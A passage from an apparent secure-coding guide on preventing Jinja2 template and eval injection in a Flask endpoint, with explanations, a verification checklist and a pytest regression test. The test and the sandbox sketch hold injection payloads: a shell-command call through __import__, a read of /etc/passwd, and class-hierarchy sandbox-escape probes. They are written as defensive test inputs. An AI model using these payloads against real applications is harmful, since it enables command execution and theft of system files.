                raise ValueError("Context keys must be strings")
            if not isinstance(value, safe_types):
                raise ValueError(f"Unsafe context type: {type(value)}")
            validated[key] = value
        return validated

@app.route('/render-message', methods=['POST'])
def render_message():
    """Render a message using the predefined safe template"""
    context = request.json
    if not isinstance(context, dict):
        return jsonify({'error': 'Context must be a dictionary'}), 400
    try:
        renderer = SafeTemplateRenderer()
        html = renderer.render("", context)
        return jsonify({'html': html})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400

# Safe usage:
# POST /render-message {
#     "title": "Hello",
#     "content": "This is a message",
#     "author": "John"
# }
# Safely rejects:
# POST /render-message {
#     "content": "{{ config }}"  # Escaped as text, not executed
# }
Why This Works
This pattern prevents eval injection in template rendering by strictly separating template structure from user-provided data. The critical security principle is that templates are trusted code written by developers, while users provide only data values to populate those templates. Jinja2's auto-escaping ensures that user data containing HTML or script tags is rendered as inert text (<script> becomes &lt;script&gt;), preventing XSS attacks. The template engine parses templates into bytecode at compile time and executes this bytecode to render output, but user data is never interpreted as template code - it is only inserted as values.
The context validation ensures only safe primitive types can be passed to templates. This prevents injection of objects with dangerous __str__ or __repr__ methods that might execute code when the template tries to render them. By disabling dangerous Jinja2 features through environment configuration and restricting available filters to a safe subset, the code limits what templates can do even if an attacker somehow controls template content. The pattern also validates that user input doesn't contain Jinja2 syntax markers ({{ }}, {% %}), ensuring users cannot inject template directives.
For applications where users need to customize templates (email notifications, reports), provide a controlled template language with limited capabilities. Jinja2's sandboxed environment can restrict access to attributes and operations, but for maximum security, use a simpler template language designed for untrusted templates like Liquid or a custom domain-specific language. Never use string concatenation or f-strings to build templates from user input - always use the template engine's parameter binding. Template engines like Jinja2, Mako, and Django templates all support safe data interpolation, but only when templates come from trusted sources and users provide data only.
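A minimal sketch of the sandboxed environment mentioned above, for the narrower case where template text itself comes from less-trusted authors:

# Minimal sketch: Jinja2's SandboxedEnvironment blocks unsafe
# attribute access at render time instead of executing it.
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError

env = SandboxedEnvironment(autoescape=True)
try:
    tmpl = env.from_string("{{ name.__class__.__mro__ }}")
    tmpl.render(name="x")
except SecurityError as e:
    print(f"Blocked: {e}")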
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations (see the test sketch after this list)
- Code review: Confirm every call site uses the secure patterns above (AST-based evaluation, explicit allowlists, SafeLoader, JSON instead of pickle) and that no eval(), exec(), compile(), __import__(), or pickle.loads() call receives untrusted input
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
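A hedged sketch automating the manual-testing bullet as a regression test (assumes pytest; "myapp" is a hypothetical module exposing the Flask app from the AST-evaluator example):

# Hedged sketch: regression test for the /calculate endpoint
# (assumes pytest; "myapp" is a hypothetical module name).
import pytest
from myapp import app  # hypothetical import of the Flask app above

@pytest.fixture
def client():
    app.config['TESTING'] = True
    return app.test_client()

MALICIOUS = [
    "__import__('os').system('whoami')",
    "open('/etc/passwd').read()",
    "().__class__.__bases__[0].__subclasses__()",
]

def test_malicious_expressions_rejected(client):
    for payload in MALICIOUS:
        resp = client.post('/calculate', json={'expression': payload})
        assert resp.status_code == 400  # rejected before any execution

def test_legitimate_expression_still_works(client):
    resp = client.post('/calculate', json={'expression': '2 + 2'})
    assert resp.status_code == 200
    assert resp.get_json()['result'] == 4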